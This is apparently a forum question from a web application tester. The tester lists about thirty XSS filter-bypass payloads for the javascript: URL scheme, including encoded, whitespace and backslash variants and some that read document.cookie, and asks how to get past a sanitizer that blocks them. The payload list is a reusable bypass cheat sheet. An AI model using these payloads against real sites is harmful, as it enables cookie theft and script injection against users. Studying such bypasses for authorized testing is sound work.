9Nis
Cross Site Scripting with URL protocol schema javascript
I'm testing a web application and I found a XSS vulnerability. I can inject schemas like data:// or tel:// but they have blocked the javascript:// schema. On current browsers the origin is null if I use data:// so data:// is not good.
I have tested:
javascript:alert(1)
javascript+:alert(1)
javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
but all of them result in this output
<a href="about:invalid#zSoyz">back</a>
I test this javascript.://%250aalert(1) and somehow it passes, but still can't execute the code.
output:
<a href="javascript.://%0aalert(1)">back</a>
Failed to launch 'javascript.://%0aalert%281%29;' because the scheme does not have a registered handler.
Maybe I'm missing something but I don't see how to execute javascript under these conditions. Any idea?
